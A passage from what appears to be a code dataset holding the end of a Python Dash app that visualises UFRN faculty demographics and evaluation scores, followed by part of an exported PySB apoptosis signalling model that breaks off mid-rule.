linha por evolução temporal\ndocentesMediasAno = avaliacaoDocentesFiltro.loc[:, [\n 'nome_docente', 'qtd_discentes', 'total_postura', 'total_atuacao', 'ano']]\ndocentesMediasAnoGroupBy = docentesMediasAno.groupby(['ano']).sum()\ndocentesMediasAnoGroupBy['media_postura'] = docentesMediasAnoGroupBy['total_postura'] / \\\n docentesMediasAnoGroupBy['qtd_discentes']\ndocentesMediasAnoGroupBy['media_atuacao'] = docentesMediasAnoGroupBy['total_atuacao'] / \\\n docentesMediasAnoGroupBy['qtd_discentes']\ndocentesMediasAnoGroupBy['media_alunos'] = avaliacaoDocentesFiltro.groupby(\n ['ano']).mean().loc[:, 'autoavaliacao_aluno_media']\ndocentesMediasAnoGroupBy['ano'] = docentesMediasAnoGroupBy.index\n\n# Cria o gráfico de linhas da evolução temporal da media_postura, media_atuacao e media_alunos\nfiguraMediasAnoGroupBy = go.Figure()\nfiguraMediasAnoGroupBy.add_trace(go.Scatter(x=docentesMediasAnoGroupBy['ano'], y=docentesMediasAnoGroupBy['media_postura'],\n mode='lines',\n name='media_postura'))\nfiguraMediasAnoGroupBy.add_trace(go.Scatter(x=docentesMediasAnoGroupBy['ano'], y=docentesMediasAnoGroupBy['media_atuacao'],\n mode='lines',\n name='media_atuacao'))\nfiguraMediasAnoGroupBy.add_trace(go.Scatter(x=docentesMediasAnoGroupBy['ano'], 
y=docentesMediasAnoGroupBy['media_alunos'],\n mode='lines',\n name='media_alunos'))\nfiguraMediasAnoGroupBy.update_layout(\n title='Evolução da avaliação dos discentes e docentes do magistério superior da UFRN nos anos de 2013 à 2019')\n\n# Define as opções de unidades dirigentes que serão mostradas no 'dropdown-1'\nindicadoresDropdown1 = [\n 'GERAL'] + list(docentesNatalMSUnidadeAcademica['unidade_dirigente'].unique())\n\n# Estilos das divs dos gráficos iniciais\nestilosDivGraficosIniciais = {'width': '95%',\n 'display': 'inline-block', 'padding': '0 20'}\n\n# Cria a variável app e escolhe os stylesheets da aplicação\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# Define o layout a ser apresentado na página web\napp.layout = html.Div([\n html.H1(children='Análise dos dados dos docentes do magistério superior da UFRN das unidades de Natal no ano de 2021'),\n html.Div([\n dcc.Markdown('''\nTrabalho referente à disciplina DCA-0131, Ciência de Dados, ministrada pelo professor Luiz Affonso Hederson Guedes de Oliveira.\n\nPlataforma desenvolvida pelos discentes Darlan de Castro e Marcos Henrique, alunos do curso de Engenharia Computação da UFRN.\n\nA aplicação web desenvolvida consiste em uma análise exploratória dos dados sobre os docentes do magistério superior das unidades de Natal da Universidade Federal do Rio Grande do Norte (UFRN) no ano de 2021.\n\nOs dados utilizados aqui podem ser acessados pelo seguinte site: [http://dados.ufrn.br](http://dados.ufrn.br)\n\nAs principais tecnologias usadas para o desenvolvimento da plataforma foram:\n\n* Linguagem Python;\n* Pacotes Pandas, Plotly e Dash;\n* Heroku (deploy da aplicação).\n''')\n ]),\n html.H2(\n children='Divisão dos docentes do magistério superior da UFRN no ano de 2021'),\n html.Div([\n\n html.Div([\n dcc.Markdown('''\n Nesta seção da aplicação pode-se acompanhar a divisão dos docentes através de difentes categorias, como sexo, formação e classe funcional, assim como ver como eles estão distribuídos por cada unidade responsável na UFRN.\n\n Na primeira caixa de seleção pode-se escolher qual unidade responsável deseja-se analisar. 
Assim, são atualizados os três primeiros gráficos com informações das divisões dos decentes referentes a cada lotação que compõe aquela unidade responsável.\n\n Se a opção for escolhida for \"GERAL\", então pode-se mostar gráficos gerais sobre toda as unidades de Natal da UFRN, ou gráficos detalhados mostrando a divisão por unidades responsáveis.\n '''),\n dcc.Dropdown(\n id='dropdown-1',\n options=[{'label': i, 'value': i}\n for i in indicadoresDropdown1],\n value='GERAL'\n ),\n dcc.RadioItems(\n id='radioitems-1',\n options=[{'label': i, 'value': i}\n for i in ['GERAL', 'DETALHADA']],\n value='GERAL',\n labelStyle={'display': 'inline-block'}\n )\n ],\n style={'width': '80%', 'display': 'inline-block'}),\n\n\n html.Div([\n dcc.Graph(\n id='grafico-sexo')\n ], style=estilosDivGraficosIniciais),\n html.Div([\n dcc.Graph(\n id='grafico-formacao')\n ], style=estilosDivGraficosIniciais),\n html.Div([\n dcc.Graph(\n id='grafico-classe')\n ], style=estilosDivGraficosIniciais),\n html.Div([\n dcc.Graph(\n id='grafico-sobra',\n figure=figuraDocentesUnidadeDirigente)\n ], style=estilosDivGraficosIniciais, id='div-grafico-sobra'),\n ]),\n\n html.H2(children='Estatísticas das avaliações dos docentes do magistério superior da UFRN (campus Natal) nos anos de 2013 à 2019'),\n dcc.Markdown('''\n Nesta seção da aplicação pode-se acompanhar dados sobre as avaliações dos docentes da UFRN e da autoavalição dos alunos feita a cada fim de semestre. Os dados disponibilizados constam do período de 2013 à 2019.\n\n Ao todo são três dados importantes a serem considerados a média de postura dos docentes, a média de atuação dos docentes e autoavaliação dos alunos.\n\n No primeiro gráfico pode-se acompanhar a média desses três quesitos por cada unidade responsável.\n '''),\n html.Div([\n dcc.Graph(\n id='grafico-nota-1')\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n html.Div([\n dcc.Slider(\n id='slider-grafico-nota-1',\n min=1,\n max=3,\n value=1,\n marks={str(i): str(i) for i in [1, 2, 3]},\n step=None)],\n style={'width': '80%', 'padding': '0px 15px 15px 15px'}),\n\n dcc.Markdown('''\n * Opção 1 - Média de atuação dos docentes;\n * Opção 2 - Média de postura dos docentes;\n * Opção 3 - Média da autoavaliação dos discentes.\n '''),\n\n dcc.Markdown('''\n No segundo gráfico há dados sobre a evolução das médias de postura e atuação dos docentes e autoavaliação dos discentes ao longo dos anos. 
\n '''),\n\n html.Div([\n dcc.Graph(\n id='grafico-nota-2',\n figure=figuraMediasAnoGroupBy)\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n\n dcc.Markdown('''\n No terceito gráfico pode-se ver um histograma com a frequência das médias de postura e atuação dos docentes dividida por sexo.\n '''),\n\n html.Div([\n dcc.Graph(\n id='grafico-histograma')\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n html.Div([\n dcc.Slider(\n id='slider-grafico-histograma',\n min=1,\n max=2,\n value=1,\n marks={str(i): str(i) for i in [1, 2]},\n step=None)],\n style={'width': '80%', 'padding': '0px 15px 15px 15px'}),\n\n dcc.Markdown('''\n * Opção 1 - Média de atuação dos docentes;\n * Opção 2 - Média de postura dos docentes.\n '''),\n\n dcc.Markdown('''\n Nesta parte, pode-se selecionar uma unidade responsável (primeira caixa de seleção) e a partir dela escolher uma lotação (segunda caixa de seleção) para verificar a média de atuação e postura de cada profressor, assim como da autoavaliação dos discentes das turmas desses docentes e quantidade de discentes que passaram por eles, para cada departamento da UFRN.\n '''),\n html.Div([\n dcc.Dropdown(\n id='dropdown-2',\n options=[{'label': i, 'value': i}\n for i in docenteParaTabelaNotas['unidade_dirigente'].unique()],\n value=docenteParaTabelaNotas['unidade_dirigente'].iloc[0]\n )],\n style={'width': '80%', 'display': 'inline-block'}),\n\n html.Div([\n dcc.Dropdown(\n id='dropdown-3',\n )],\n style={'width': '80%', 'display': 'inline-block'}),\n\n html.Div([\n dash_table.DataTable(\n id='table-nota',\n columns=[{\"name\": i, \"id\": i} for i in [\n 'nome', 'media_postura', 'media_atuacao', 'media_alunos', 'qtd_discentes']],\n style_cell={'textAlign': 'left'},\n )\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n\n])\n\n# Callback para atualização do estilo dos gráfico de barras (quatantidadeDocente x unidade_dirigente)\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-classe'\n\n\n@app.callback(\n dash.dependencies.Output('div-grafico-sobra', 'style'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef visibility_graficoSobra(dropValue, radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n estilosDivGraficosIniciais['display'] = 'inline-block'\n return estilosDivGraficosIniciais\n estilosDivGraficosIniciais['display'] = 'none'\n return estilosDivGraficosIniciais\n\n# Callback para atualização da 'figure' no gráfico por sexo.\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-sexo'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-sexo', 'figure'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef att_sexo(dropValue, radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n return figuraDocentesSexo\n elif(radioValue == 'DETALHADA' and dropValue == 'GERAL'):\n return figSexoDetalhe\n return filtrarDFPorUnidadeDirigente(dfUnidadesDirigentes, dropValue, 'lotacao', 'sexo')\n\n# Callback para atualização da 'figure' no gráfico por formação\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-formacao'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-formacao', 'figure'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef att_formacao(dropValue, 
radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n return figuraDocentesFormacao\n elif(radioValue == 'DETALHADA' and dropValue == 'GERAL'):\n return figFormacaoDetalhe\n return filtrarDFPorUnidadeDirigente(dfUnidadesDirigentes, dropValue, 'lotacao', 'formacao')\n\n# Callback para atualização da 'figure' no gráfico por classe\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-classe'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-classe', 'figure'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef att_classe(dropValue, radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n return figuraDocentesClasseFuncional\n elif(radioValue == 'DETALHADA' and dropValue == 'GERAL'):\n return figClasseDetalhe\n return filtrarDFPorUnidadeDirigente(dfUnidadesDirigentes, dropValue, 'lotacao', 'classe_funcional')\n\n# Callback para atualização da 'figure' no gráfico por nota\n# Entradas: 'value' - 'slider-grafico-nota-1'\n# Saída: 'figure' - 'grafico-nota-1'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-nota-1', 'figure'),\n [dash.dependencies.Input('slider-grafico-nota-1', 'value')])\ndef att_nota1(sliderValue):\n var = 'media_atuacao'\n if sliderValue == 2:\n var = 'media_postura'\n elif sliderValue == 3:\n var = 'media_alunos'\n return px.scatter(docentesMediaUnidadeDirigente, x=\"unidade_dirigente\", y=var,\n size=var, hover_name=\"unidade_dirigente\", color=\"unidade_dirigente\")\n\n# Callback para atualização da 'figure' no histograma\n# Entradas: 'value' - 'slider-grafico-histograma'\n# Saída: 'figure' - 'grafico-histograma'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-histograma', 'figure'),\n [dash.dependencies.Input('slider-grafico-histograma', 'value')])\ndef att_histograma(sliderValue):\n var = 'media_atuacao'\n if sliderValue == 2:\n var = 'media_postura'\n return px.histogram(docentesMediasNatalMSUnidadeAcademica, x=var, color=\"sexo\", title='Histograma da avaliação dos docentes do magistério superior da UFRN nos anos de 2013 à 2019')\n\n# Callback para atualização das 'options' no dropdown por lotação da tabela\n# Entradas: 'value' - 'dropdown-2'\n# Saída: 'options' - 'dropdown-3'\n\n\n@app.callback(\n dash.dependencies.Output('dropdown-3', 'options'),\n [dash.dependencies.Input('dropdown-2', 'value')])\ndef att_dropdown3Options(dropValue):\n df = docenteParaTabelaNotas[docenteParaTabelaNotas['unidade_dirigente'] == dropValue]\n del df['unidade_dirigente']\n return [{'label': 'GERAL', 'value': 'GERAL'}] + [{'label': i, 'value': i} for i in df['lotacao'].unique()]\n\n# Callback para atualização do 'value' no dropdown por lotação da tabela\n# Entradas: 'value' - 'dropdown-2'\n# Saída: 'value' - 'dropdown-3'\n\n\n@app.callback(\n dash.dependencies.Output('dropdown-3', 'value'),\n [dash.dependencies.Input('dropdown-2', 'value')])\ndef att_dropdown3Value(dropValue):\n return 'GERAL'\n\n# Callback para atualização da 'data' na tabela de exposição das notas dos professores por unidade_dirigente e lotação\n# Entradas: 'value' - 'dropdown-2', value' - 'dropdown-3'\n# Saída: 'data' - 'table-nota'\n\n\n@app.callback(\n dash.dependencies.Output('table-nota', 'data'),\n [dash.dependencies.Input('dropdown-2', 'value'),\n dash.dependencies.Input('dropdown-3', 'value')])\ndef att_table(dropValue2, dropValue3):\n df = docenteParaTabelaNotas[docenteParaTabelaNotas['unidade_dirigente'] == dropValue2]\n del df['unidade_dirigente']\n if dropValue3 == 
'GERAL':\n del df['lotacao']\n return df.to_dict(\"records\")\n df = docenteParaTabelaNotas[docenteParaTabelaNotas['lotacao'] == dropValue3]\n del df['lotacao']\n return df.to_dict(\"records\")\n\n\n# Atribui o servidor da aplicação a variável server\nserver = app.server\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n"} {"ext": "py", "sha": "1a2eba011c074c0754bab4c140f94ad660cb4a7b", "content": "# exported from PySB model 'model'\n\nfrom pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD\n\nModel()\n\nMonomer('Ligand', ['Receptor'])\nMonomer('ParpU', ['C3A'])\nMonomer('C8A', ['BidU', 'C3pro'])\nMonomer('SmacM', ['BaxA'])\nMonomer('BaxM', ['BidM', 'BaxA'])\nMonomer('Apop', ['C3pro', 'Xiap'])\nMonomer('Fadd', ['Receptor', 'C8pro'])\nMonomer('SmacC', ['Xiap'])\nMonomer('ParpC')\nMonomer('Xiap', ['SmacC', 'Apop', 'C3A'])\nMonomer('C9')\nMonomer('C3ub')\nMonomer('C8pro', ['Fadd', 'C6A'])\nMonomer('C6A', ['C8pro'])\nMonomer('C3pro', ['Apop', 'C8A'])\nMonomer('CytoCM', ['BaxA'])\nMonomer('CytoCC')\nMonomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'SmacM', 'CytoCM'])\nMonomer('ApafI')\nMonomer('BidU', ['C8A'])\nMonomer('BidT')\nMonomer('C3A', ['Xiap', 'ParpU', 'C6pro'])\nMonomer('ApafA')\nMonomer('BidM', ['BaxM'])\nMonomer('Receptor', ['Ligand', 'Fadd'])\nMonomer('C6pro', ['C3A'])\n\nParameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)\nParameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)\nParameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)\nParameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 
1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)\nParameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)\nParameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)\nParameter('pore_formation_0_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_0_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_1_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_1_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_2_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_2_BaxA_pore_1kr', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)\nParameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('Ligand_0', 1000.0)\nParameter('ParpU_0', 1000000.0)\nParameter('C8A_0', 0.0)\nParameter('SmacM_0', 100000.0)\nParameter('BaxM_0', 40000.0)\nParameter('Apop_0', 0.0)\nParameter('Fadd_0', 130000.0)\nParameter('SmacC_0', 0.0)\nParameter('ParpC_0', 0.0)\nParameter('Xiap_0', 122250.0)\nParameter('C9_0', 100000.0)\nParameter('C3ub_0', 0.0)\nParameter('C8pro_0', 130000.0)\nParameter('C6A_0', 0.0)\nParameter('C3pro_0', 21000.0)\nParameter('CytoCM_0', 500000.0)\nParameter('CytoCC_0', 0.0)\nParameter('BaxA_0', 0.0)\nParameter('ApafI_0', 100000.0)\nParameter('BidU_0', 171000.0)\nParameter('BidT_0', 0.0)\nParameter('C3A_0', 0.0)\nParameter('ApafA_0', 0.0)\nParameter('BidM_0', 0.0)\nParameter('Receptor_0', 100.0)\nParameter('C6pro_0', 100.0)\n\nObservable('Ligand_obs', Ligand())\nObservable('ParpU_obs', ParpU())\nObservable('C8A_obs', C8A())\nObservable('SmacM_obs', SmacM())\nObservable('BaxM_obs', BaxM())\nObservable('Apop_obs', Apop())\nObservable('Fadd_obs', Fadd())\nObservable('SmacC_obs', SmacC())\nObservable('ParpC_obs', ParpC())\nObservable('Xiap_obs', Xiap())\nObservable('C9_obs', C9())\nObservable('C3ub_obs', C3ub())\nObservable('C8pro_obs', C8pro())\nObservable('C6A_obs', C6A())\nObservable('C3pro_obs', C3pro())\nObservable('CytoCM_obs', CytoCM())\nObservable('CytoCC_obs', CytoCC())\nObservable('BaxA_obs', BaxA())\nObservable('ApafI_obs', ApafI())\nObservable('BidU_obs', BidU())\nObservable('BidT_obs', BidT())\nObservable('C3A_obs', C3A())\nObservable('ApafA_obs', ApafA())\nObservable('BidM_obs', BidM())\nObservable('Receptor_obs', Receptor())\nObservable('C6pro_obs', 
C6pro())\n\nRule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)\nRule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)\nRule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)\nRule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)\nRule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)\nRule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)\nRule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)\nRule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, Apop=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, Apop=None, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)\nRule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)\nRule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None, C8A=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(SmacC=None, Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(SmacC=None, Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)\nRule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)\nRule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, 
ParpU=None, C6pro=None) >> Xiap(SmacC=None, Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)\nRule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)\nRule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)\nRule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)\nRule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)\nRule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)\nRule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)\nRule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)\nRule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)\nRule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)\nRule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, 